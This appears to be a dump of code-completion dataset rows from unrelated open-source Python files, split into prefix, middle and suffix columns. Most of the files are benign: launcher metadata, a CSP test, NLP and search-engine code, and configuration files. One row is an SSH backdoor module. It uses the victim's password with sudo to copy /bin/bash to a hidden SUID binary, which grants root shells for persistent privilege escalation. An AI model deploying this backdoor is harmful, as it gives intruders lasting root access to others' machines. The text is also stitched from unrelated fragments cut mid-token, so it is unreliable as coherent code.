repo_name stringlengths 5 100 | path stringlengths 4 231 | language stringclasses 1 value | license stringclasses 15 values | size int64 6 947k | score float64 0 0.34 | prefix stringlengths 0 8.16k | middle stringlengths 3 512 | suffix stringlengths 0 8.17k |
|---|---|---|---|---|---|---|---|---|
Lynx3d/pylotro | PyLotROLauncher/Information.py | Python | gpl-3.0 | 441 | 0.004535 | # coding=utf-8
Version = "0.2.0"
Description = "LOTRO/DDO Launcher"
Author | = "Alan Jackson"
Email = "ajackson@bcs.org.uk"
WebSite = "http://www.lotrolinux.com"
LongDescription = "Lord of the Rings Online and Dungeons & Dragons Online\nLauncher for Linux & Mac OS X"
Copyright=" (C) 2009-2010 AJackson"
CLIRef | erence = "Based on CLI launcher for LOTRO\n(C) 2007-2010 SNy"
LotROLinuxReference = "Based on LotROLinux\n(C) 2007-2009 AJackson"
|
kaixinjxq/web-testing-service | wts/tests/csp/csp_media-src_corss-origin_audio_allowed_ext.py | Python | bsd-3-clause | 3,027 | 0.001321 | def main(request, response):
import simplejson as json
f = file('config.json')
source = f.read()
s = json.JSONDecoder().decode(source)
url1 = "http://" + s['host'] + ":" + str(s['ports']['http'][1])
url2 = "http://" + s['host'] + ":" + str(s['ports']['http'][0])
_CSP = "media-src " + url1 + "; script-src 'self' 'unsafe-inline'"
response.headers.set("Content-Security-Policy", _CSP)
response.headers.set("X-Content-Security-Policy", _CSP)
response.headers.set("X-WebKit-CSP", _CSP)
return """<!DOCTYPE html>
<!--
Copyright (c) 2013 Intel Corporation.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of works must retain the original copyright notice, this list
of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the original copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
may be used to endorse or promote products derived from this work without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Authors:
Zhang, Zhiqiang <zhiqiang.zhang@i | ntel.com>
-->
<html>
<head>
<title>CSP Test: csp_media-src_cross-origin_audio_allowed_e | xt</title>
<link rel="author" title="Intel" href="http://www.intel.com"/>
<link rel="help" href="http://www.w3.org/TR/2012/CR-CSP-20121115/#media-src"/>
<meta name="flags" content=""/>
<meta charset="utf-8"/>
<script src="../resources/testharness.js"></script>
<script src="../resources/testharnessreport.js"></script>
</head>
<body>
<div id="log"></div>
<audio id="m"></audio>
<script>
var t = async_test(document.title);
var m = document.getElementById("m");
m.src = '""" + url1 + """/tests/csp/support/khronos/red-green.theora.ogv';
window.setTimeout(function() {
t.step(function() {
assert_false(m.currentSrc == "",
"audio.currentSrc should not be empty after setting src attribute");
});
t.done();
}, 0);
</script>
</body>
</html> """
|
D-K-E/cltk | src/cltk/ner/processes.py | Python | mit | 4,577 | 0.001374 | """This module holds the ``Process``es for NER."""
from copy import deepcopy
from dataclasses import dataclass
from typing import Any, List
from boltons.cacheutils import cachedproperty
from cltk.core.data_types import Doc, Process
from cltk.ner.ner import tag_ner
@dataclass
class NERProcess(Process):
    """To be inherited for each language's NER declarations.
    >>> from cltk.core.data_types import Doc
    >>> from cltk.ner.processes import NERProcess
    >>> from cltk.core.data_types import Process
    >>> issubclass(NERProcess, Process)
    True
    >>> emb_proc = NERProcess()
    """
    # ISO language code; subclasses override this (e.g. "grc", "lat").
    language: str = None
    @cachedproperty
    def algorithm(self):
        # Cached so the tag_ner callable is resolved once per process instance.
        return tag_ner
    def run(self, input_doc: Doc) -> Doc:
        """Annotate every word of *input_doc* with its NER tag.

        Works on a deep copy, so the caller's Doc is left unmodified.
        Assumes tag_ner returns one entity value per input token, aligned
        by position with ``output_doc.words``.
        """
        output_doc = deepcopy(input_doc)
        ner_obj = self.algorithm
        entity_values = ner_obj(
            iso_code=self.language, input_tokens=input_doc.tokens
        ) # type: List[Any]
        for index, word_obj in enumerate(output_doc.words):
            word_obj.named_entity = entity_values[index]
            output_doc.words[index] = word_obj
        return output_doc
@dataclass
class GreekNERProcess(NERProcess):
"""The default Greek NER algorithm.
.. todo::
Update doctest w/ production model
>>> from cltk.core.data_types import Doc, Word
>>> from cltk.languages.example_texts import get_example_text
>>> from boltons.strutils import split_punct_ws
>>> text = "ἐπὶ δ᾽ οὖν τοῖς πρώτοις τοῖσδε Περικλῆς ὁ Ξανθίππου ᾑρέθη λέγειν. καὶ ἐπειδὴ καιρὸς ἐλάμβανε, προελθὼν ἀπὸ τοῦ σήματος ἐπὶ βῆμα ὑψηλὸν πεποιημένον, ὅπως ἀκούοιτο ὡς ἐπὶ πλεῖστον τοῦ ὁμίλου, ἔλεγε τοιάδε."
>>> tokens = [Word(string=token) for token in split_punct_ws(text)]
>>> a_process = GreekNERProcess()
>>> output_doc = a_process.run(Doc(raw=text, words=tokens))
>>> output_doc.words[7].string
'ὁ'
>>> output_doc.words[7].named_entity
False
>>> output_doc.words[8].string
'Ξανθίππου'
>>> output_doc.words[8].named_entity
False
"""
language: str = "grc"
description: str = "Default NER for Greek."
@dataclass
class OldEnglishNERProcess(NERProcess):
"""The default OE NER algorithm.
.. todo::
Update doctest w/ production model
>>> from cltk.core.data_types import Doc, Word
>>> from cltk.languages.example_texts import get_example_text
>>> from boltons.strutils import split_punct_ws
>>> text = get_example_text(iso_code="ang")
>>> tokens = [Word(string=token) for token in split_punct_ws(text)]
>>> a_process = OldEnglishNERProcess()
>>> output_doc = a_process.run(Doc(raw=text, words=tokens))
>>> output_doc.words[2].string, output_doc.words[2].named_entity
('Gardena', 'LOCATION')
"""
language: str = "ang"
description: str = "Default NER for Old English."
@dataclass
class LatinNERProcess(NERProcess):
"""The default Latin NER algorithm.
>>> from cltk.core.data_types import Doc, Word
>>> from cltk.languages.example_texts import get_example_text
>>> from boltons.strutils import split_punct_ws
>>> tokens = [Word(string=token) for token in split_punct_ws(get_example_text("lat"))]
>>> a_process = LatinNERProcess()
>>> output_doc = a_process.run(Doc(raw=get_example_text("lat"), words=tokens))
>>> [word.named_entity for word in output_doc.words][:20]
['LOCATION', False, False, False, False, False, False, False, False, False, 'LOCATION', False, 'LOCATION', False, False, False, False, 'LOCATION', False, 'LOCATION']
"""
language: str = "lat"
description: str = "Default NER for Latin."
@dataclass
class OldFrenchNERProcess(NERProcess):
"""The default Old French NER algorithm.
>>> from cltk.core.data_types import Doc, Word
>>> from cltk.languages.example_texts import get_example_text
>>> from boltons.strutils import split_punct_ws
>>> tok | ens = [Word(string=token) for token in split_punct_ws(get_example_text("fro"))]
>>> a_process = OldFrenchNERProcess()
>>> output_doc = a_process.run(Doc(raw=get_example_text("fro"), words=tokens))
>>> output_doc.words[30].string
'Bretaigne'
>>> output_doc.words[30].named_entity
'LOC'
>>> output_doc.words[31].named_entity
False
"""
language: str = "fro"
description: str = "Default NER for O | ld French."
|
websauna/pyramid_sms | docs/conf.py | Python | isc | 8,451 | 0.005325 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# pyramid_sms documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import pyramid_sms
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'SMS for Pyramid'
copyright = u'2016, Mikko Ohtamaa'
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = "0.1"
# The full version, including alpha/beta/rc tags.
release = "0.1"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pyramid_smsdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'pyramid_sms.tex',
u'SMS for Pyramid Documentation',
u'Mikko Ohtamaa', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pyramid_sms',
u'SMS for Pyramid Documentation',
[u'Mikko Ohtamaa'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. | List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pyramid_sms',
u'SMS for Pyramid Documentation',
u'Mikko Ohtamaa',
'pyramid_sms',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appen | dix to all manuals.
#texinfo_appendices = []
# If false, no module ind |
asciimoo/searx | searx/engines/json_engine.py | Python | agpl-3.0 | 3,207 | 0.000624 | from collections import Iterable
from json import loads
from sys import version_info
from searx.url_utils import urlencode
from searx.utils import to_string
if version_info[0] == 3:
unicode = str
search_url = None
url_query = None
content_query = None
title_query = None
paging = False
suggestion_query = ''
results_query = ''
# parameters for engines with paging support
#
# number of results on each page
# (only needed if the site requires not a page number, but an offset)
page_size = 1
# number of the first page (usually 0 or 1)
first_page_num = 1
def iterate(iterable):
    """Yield (key, value) pairs with the key coerced to str.

    Dicts yield their own keys; any other iterable yields positional
    indices, mirroring enumerate().
    """
    if type(iterable) == dict:
        pairs = iterable.items()
    else:
        pairs = enumerate(iterable)
    for key, val in pairs:
        yield str(key), val
def is_iterable(obj):
    # Strings are iterable but must be treated as scalars here so that
    # do_query() does not descend into individual characters.
    if type(obj) == str:
        return False
    # `unicode` is aliased to `str` at module level on Python 3 (see the
    # version_info check at the top of this module); on Python 2 this
    # rejects unicode strings as well.
    if type(obj) == unicode:
        return False
    return isinstance(obj, Iterable)
def parse(query):
    """Split a '/'-separated query path into its non-empty segments.

    Leading, trailing and doubled slashes produce empty segments, which
    are dropped, so 'a//b/' parses to ['a', 'b'].
    """
    # Idiomatic replacement for the original append-loop: keep only
    # non-empty path components.
    return [part for part in query.split('/') if part]
def do_query(data, q):
    """Recursively collect every value reachable under the key path *q*.

    *q* is a list of path segments (from parse()). Matching is
    depth-first and a segment may match at any nesting depth, so all
    occurrences in *data* are gathered into the returned list.
    """
    ret = []
    if not q:
        return ret
    qkey = q[0]
    for key, value in iterate(data):
        if len(q) == 1:
            # Last path segment: collect direct matches, but keep
            # descending into containers to find deeper occurrences.
            if key == qkey:
                ret.append(value)
            elif is_iterable(value):
                ret.extend(do_query(value, q))
        else:
            # More segments remain, so only containers can match further.
            if not is_iterable(value):
                continue
            if key == qkey:
                # Segment consumed; continue with the remainder of the path.
                ret.extend(do_query(value, q[1:]))
            else:
                # No match at this level; retry the full path one level deeper.
                ret.extend(do_query(value, q))
    return ret
def query(data, query_string):
    """Run a '/'-separated path query against a JSON-like structure."""
    return do_query(data, parse(query_string))
def request(query, params):
    """Build the outgoing request URL for this JSON engine.

    Fills the engine-level `search_url` template with the url-encoded
    query and, when paging is enabled, a page number. *params* is the
    searx request dict and is mutated in place, then returned.
    """
    # urlencode({'q': ...}) yields "q=<encoded>"; [2:] strips the "q=".
    query = urlencode({'q': query})[2:]
    fp = {'query': query}
    if paging and search_url.find('{pageno}') >= 0:
        # Translate the searx page number (1-based, given the -1 here)
        # into this engine's scheme; offset-based engines use page_size > 1.
        fp['pageno'] = (params['pageno'] - 1) * page_size + first_page_num
    params['url'] = search_url.format(**fp)
    params['query'] = query
    return params
|
def response(resp):
resul | ts = []
json = loads(resp.text)
if results_query:
rs = query(json, results_query)
if not len(rs):
return results
for result in rs[0]:
try:
url = query(result, url_query)[0]
title = query(result, title_query)[0]
except:
continue
try:
content = query(result, content_query)[0]
except:
content = ""
results.append({
'url': to_string(url),
'title': to_string(title),
'content': to_string(content),
})
else:
for url, title, content in zip(
query(json, url_query),
query(json, title_query),
query(json, content_query)
):
results.append({
'url': to_string(url),
'title': to_string(title),
'content': to_string(content),
})
if not suggestion_query:
return results
for suggestion in query(json, suggestion_query):
results.append({'suggestion': suggestion})
return results
|
Sonophoto/PythonNotes | primalPython/primalPython.py | Python | bsd-2-clause | 2,338 | 0.010265 | # Primal Python:
#
# Functions for calculating primeness of numbers.
# Implementation (c) 2016-2020 Brig Young (github.com/Sonophoto)
# License: BSD-2c, i.e. Cite. [LINK TO REPO]
#
# Original Problem Statement
# accept number input
# list all primes upto and including this number.
# return a python list in ascending order
#
# First code is to sum the digits of the number
# Next we code for divisibility by 3, 5, 7,
from math import sqrt
from functools import wraps
def digitalRoot(number):
""" Takes a single value "number" as type(int) or type(str) and
calculates the dig | ital root. Recurses as needed to reduce
digital_root to a single digit.
See: https://oeis.org/A010888 for more on digital roots.
"""
number = _validate(number)
digital_root = 0
for c in number: digital_root += int(c)
i | f digital_root < 10:
return digital_root
elif digital_root >= 10: # We have more than one digit, recurse
return digitalRoot(digital_root)
def digitalSum(number):
    """Sum the decimal digits of *number* (an int or a digit string).

    Input is normalised through _validate(); unlike digitalRoot() the
    result is NOT reduced further to a single digit.
    """
    digits = _validate(number)
    return sum(int(ch) for ch in digits)
def pyPrimeFinder(number):
    """Print a factorisation or primality line for every n in [2, number).

    Brute-force demo taken from the Python tutorial's loop-else example:
    https://docs.python.org/3/tutorial/controlflow.html#break-and-continue-statements-and-else-clauses-on-loops
    """
    for candidate in range(2, number):
        # Smallest divisor in [2, candidate), or None if candidate is prime.
        divisor = next(
            (d for d in range(2, candidate) if candidate % d == 0), None)
        if divisor is None:
            print(candidate, 'is a prime number')
        else:
            print(candidate, 'equals', divisor, '*', candidate // divisor)
def _validate(number):
""" Verify that returned value is valid string representation of an
integer value or error.
"""
# Validate Input
if type(number) == str: # If it is a string, make sure it is digits
if isdigit(number): number
else:
print("Verify that your imput consists of the digits 0 thru 9. Your input: ", number)
return -1 #Bad Input
elif type(number) == int: # It is an integer value, convert to string
number = str(number)
return number
|
andnovar/kivy | kivy/tools/report.py | Python | mit | 5,809 | 0.002238 | '''
Report tool
===========
This tool is a helper for users. It can be used to dump information
for help during the debugging process.
'''
import os
import sys
from time import ctime
from configparser import ConfigParser
from io import StringIO
import kivy
report = []
report_dict = {} # One key value pair for each title.
def title(t):
    """Append a banner-framed section heading to the module-level report."""
    bar = '=' * 80
    report.extend(['', bar, t, bar, ''])
# This method sends report to gist(Different file in a single gist) and
# returns the URL
def send_report(dict_report):
    """POST the report sections to GitHub as one multi-file gist.

    Each section of *dict_report* becomes a separate text file in the
    gist. Returns the html_url of the newly created gist.
    """
    import requests
    import json
    # (gist file name, dict_report key), in the order the files appear.
    section_files = [
        ("Global.txt", "Global"),
        ("OpenGL.txt", "OpenGL"),
        ("Core selection.txt", "Core"),
        ("Libraries.txt", "Libraries"),
        ("Configuration.txt", "Configuration"),
        ("Input Availablity.txt", "InputAvailablity"),
        ("Environ.txt", "Environ"),
        ("Options.txt", "Options"),
    ]
    files = {
        filename: {"content": "\n".join(dict_report[key]), "type": "text"}
        for filename, key in section_files
    }
    gist_report = {
        "description": "Report",
        "public": "true",
        "files": files,
    }
    report_json = json.dumps(gist_report)
    response = requests.post("https://api.github.com/gists", report_json)
    return json.loads(response.text)['html_url']
# ----------------------------------------------------------
# Start output debugging
# ----------------------------------------------------------
title('Global')
report.append('OS platform : %s' % sys.platform)
report.append('Python EXE : %s' % sys.executable)
report.append('Python Version : %s' % sys.version)
report.append('Python API : %s' % sys.api_version)
report.append('Kivy Version : %s' % kivy.__version__)
report.append('Install path : %s' % os.path.dirname(kivy.__file__))
report.append('Install date : %s' % ctime(os.path.getctime(kivy.__file__)))
report_dict['Global'] = report
report = []
title('OpenGL')
from kivy.core import gl
from kivy.core.window import Window
report.append('GL Vendor: %s' % gl.glGetString(gl. | GL_VENDOR))
report.append('GL Renderer: %s' % gl.glGetString(gl.GL_RENDERER))
report.append('GL Version: %s' % gl.glGetString(gl.GL_VERSION))
ext = gl.glGetString(gl.GL_EXTENSIONS)
if ext is None:
report.append('GL Extensions: %s' % ext)
else:
report.append('GL Extensions:')
for x in ext.split():
report.append('\t%s' % x)
Window.close()
report_dict['OpenGL'] = report
report = []
title('Core selection')
from kivy.core.audio import SoundLoader
report.a | ppend('Audio = %s' % SoundLoader._classes)
from kivy.core.camera import Camera
report.append('Camera = %s' % Camera)
from kivy.core.image import ImageLoader
report.append('Image = %s' % ImageLoader.loaders)
from kivy.core.text import Label
report.append('Text = %s' % Label)
from kivy.core.video import Video
report.append('Video = %s' % Video)
report.append('Window = %s' % Window)
report_dict['Core'] = report
report = []
title('Libraries')
def testimport(libname):
    """Record in the module-level report whether *libname* imports, and from where."""
    try:
        module = __import__(libname)
        entry = '%-20s exist at %s' % (libname, module.__file__)
    except ImportError:
        entry = '%-20s is missing' % libname
    report.append(entry)
for x in (
'gst',
'pygame',
'pygame.midi',
'pyglet',
'videocapture',
'squirtle',
'PIL',
'opencv',
'opencv.cv',
'opencv.highgui',
'cython'):
testimport(x)
report_dict['Libraries'] = report
report = []
title('Configuration')
s = StringIO()
from kivy.config import Config
ConfigParser.write(Config, s)
report.extend(s.getvalue().split('\n'))
report_dict['Configuration'] = report
report = []
title('Input availability')
from kivy.input.factory import MotionEventFactory
for x in MotionEventFactory.list():
report.append(x)
report_dict['InputAvailablity'] = report
report = []
'''
title('Log')
for x in pymt_logger_history.history:
report.append(x.message)
'''
title('Environ')
for k, v in os.environ.items():
report.append('%s = %s' % (k, v))
report_dict['Environ'] = report
report = []
title('Options')
for k, v in kivy.kivy_options.items():
report.append('%s = %s' % (k, v))
report_dict['Options'] = report
report = []
# Prints the entire Output
print('\n'.join(report_dict['Global'] + report_dict['OpenGL'] +
report_dict['Core'] + report_dict['Libraries'] +
report_dict['Configuration'] +
report_dict['InputAvailablity'] +
report_dict['Environ'] + report_dict['Options']))
print()
print()
try:
reply = input(
'Do you accept to send report to https://gist.github.com/ (Y/n) : ')
except EOFError:
sys.exit(0)
if reply.lower().strip() in ('', 'y'):
print('Please wait while sending the report...')
paste_url = send_report(report_dict)
print()
print()
print('REPORT posted at %s' % paste_url)
print()
print()
else:
print('No report posted.')
# On windows system, the console leave directly after the end
# of the dump. That's not cool if we want get report url
input('Enter any key to leave.')
|
lgarren/spack | var/spack/repos/builtin/packages/r-gridextra/package.py | Python | lgpl-2.1 | 1,773 | 0.000564 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Pl | ace, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RGridextra(RPackage):
    """Provides a number of user-level functions to work with "grid" graphics,
    notably to arrange multiple grid-based plots on a page, and draw tables."""
    homepage = "https://cran.r-project.org/package=gridExtra"
    url = "https://cran.r-project.org/src/contrib/gridExtra_2.2.1.tar.gz"
    # Release listing lives at the same CRAN page as the homepage.
    list_url = homepage
    # version(<release>, <md5 checksum of the source tarball>)
    version('2.3', '01e0ea88610756a0fd3b260e83c9bd43')
    version('2.2.1', '7076c2122d387c7ef3add69a1c4fc1b2')
    # gridExtra requires the R gtable package both at build and at run time.
    depends_on('r-gtable', type=('build', 'run'))
|
angelbarrera92/simple-python-load-balancer | loadbalancer/validator.py | Python | mit | 1,735 | 0.004035 | from jsonschema import validate
import jsonschema, sys
user_schema = {
"type": "object",
"properties": {
"email": {"type": "string", "pattern": "(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"},
"password": | {"type": "string", "minLength": 6, "maxLength": 30},
},
"required": ["email", "password"]
}
app_new_machine_schema = {
"type": "object",
"properties": {
"host": {"type": "string"},
"port": {"type": "number", "minimum": 0, "maximum": 65535},
"statuspath" : {"type": "string"}
},
"required": ["host", "port", "statuspath"]
}
app_machine_schema = {
"type": "object",
"prop | erties": {
"host": {"type": "string"},
"port": {"type": "number", "minimum": 0, "maximum": 65535}
},
"required": ["host", "port"]
}
def is_user_json_valid(user_json):
    """Validate *user_json* against user_schema.

    Returns True on success; on schema violation logs the error to
    stderr and returns False.
    """
    try:
        validate(user_json, user_schema)
    except jsonschema.exceptions.ValidationError as ve:
        sys.stderr.write(str(ve) + "\n")
        return False
    return True
def is_new_machine_json_valid(machine_json):
    """Validate *machine_json* against app_new_machine_schema.

    Returns True on success; on schema violation logs the error to
    stderr and returns False.
    """
    try:
        validate(machine_json, app_new_machine_schema)
    except jsonschema.exceptions.ValidationError as ve:
        sys.stderr.write(str(ve) + "\n")
        return False
    return True
def is_machine_json_valid(machine_json):
try:
validate(machine_json, app_machine_schema)
return True
except jsonschema.exceptions.ValidationError as ve:
# sys.stderr.write("Record #{}: ERROR\n".format(user_json))
sys.stderr.write(str(ve) + "\n")
return False |
sgraham/nope | tools/perf/benchmarks/start_with_url.py | Python | bsd-3-clause | 1,178 | 0.014431 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from measurements import startup
import page_sets
from tele | metry import benchmark
class _StartWithUrl(benchmark.Benchmark):
    """Shared base for the cold/warm start-with-URL benchmarks below."""
    page_set = page_sets.StartupPagesPageSet
    test = startup.StartWithUrl
    @classmethod
    def Name(cls):
        return 'start_with_url.startup_pages'
    def CreatePageTest(self, options):
        # Subclasses set `tag` to 'cold' or 'warm'; presumably StartWithUrl
        # uses the flag to pick the launch mode — confirm in measurements.startup.
        is_cold = (self.tag == 'cold')
        return self.test(cold=is_cold)
@benchmark.Enabled('has tabs')
@benchmark.Disabled('chromeos', 'linux', 'mac', 'win')
class StartWithUrlCold(_StartWithUrl):
    """Measure time to start Chrome cold with startup URLs"""
    tag = 'cold'
    # NOTE(review): fewer repeats than the warm variant (5 vs 10) —
    # presumably because cold starts cost more per run; confirm.
    options = {'pageset_repeat': 5}
    @classmethod
    def Name(cls):
        return 'start_with_url.cold.startup_pages'
@benchmark.Enabled('has tabs')
@benchmark.Disabled('chromeos', 'linux', 'mac', 'win')
class StartWithUrlWarm(_StartWithUrl):
    """Measure time to start Chrome warm with startup URLs"""
    tag = 'warm'
    # Warm runs are cheaper, so more repetitions are affordable.
    options = {'pageset_repeat': 10}
    @classmethod
    def Name(cls):
        return 'start_with_url.warm.startup_pages'
|
krintoxi/NoobSec-Toolkit | NoobSecToolkit /scripts/sshbackdoors/backdoors/escalation/shell.py | Python | gpl-2.0 | 1,559 | 0.007056 | from backdoor import *
class Shell(Backdoor):
prompt = Fore.RED + "(shell) " + Fore.BLUE + ">> " + Fore.RESET
def __init__(self, core):
cmd.Cmd.__init__(self)
self.intro = GOOD + "Using Shell backdoor..."
self.core = core
self.options = {
"name" : Option("name", "/bin/.bash", "name of the duplicated shell", True),
}
self.modules = {}
self.allow_modules = True
self.help_text = GOOD + "The shell backdoor is a priviledge escalation backdoor, similar to (but more powerful than) it's SetUID escalation brother. It duplicates the bash shell to a hidden binary, and sets the SUID bit. Unlike the SetUID backdoor though, this shell gives an unpriviledged user root priviledge with a full shell. Note that you need root access to initially deploy. To use, while SSHed in as an unprivile | dged user, simply run \".bash -p\", and you will have root access."
def get_command(self):
return "echo " + self.core.curtarget.pword + " | sudo -S cp /bin/bash " + self.get_value("name") + " && echo " + self.core.curtarget.pword + " | sudo -S chmod 4755 " + self.get_value("name")
def do_exploit(self, args):
target = self.core.curtarget
print(GOOD + "Initializing backdoor...")
target.ssh.exec_command(self.get_c | ommand())
print(GOOD + "Shell Backdoor attempted.")
for mod in self.modules.keys():
print(INFO + "Attempting to execute " + mod.name + " module...")
mod.exploit()
|
bmarshallk/NAASC | packaging_scripts/PackageManualDataset.py | Python | gpl-3.0 | 14,173 | 0.02025 | #This code packages manually calibrated and imaged datasets
# --------------------------------------------------------------------------------------------------
def ReadDataFromWeb(mousid):
# --------------------------------------------------------------------------------------------------
"""
This function reads the metadata about the project for the given MOUS
"""
import urllib2
dataurl="http://www.eso.org/~fstoehr/project_ous_eb_hierarchy.txt"
dataurl2="http://www.eso.org/~fstoehr/ous_eb_qa0status.txt"
#print "Gathering metadata..."
response = urllib2.urlopen(dataurl)
html = response.read().splitlines()
response = None
mousid = str(mousid)
datadict = {}
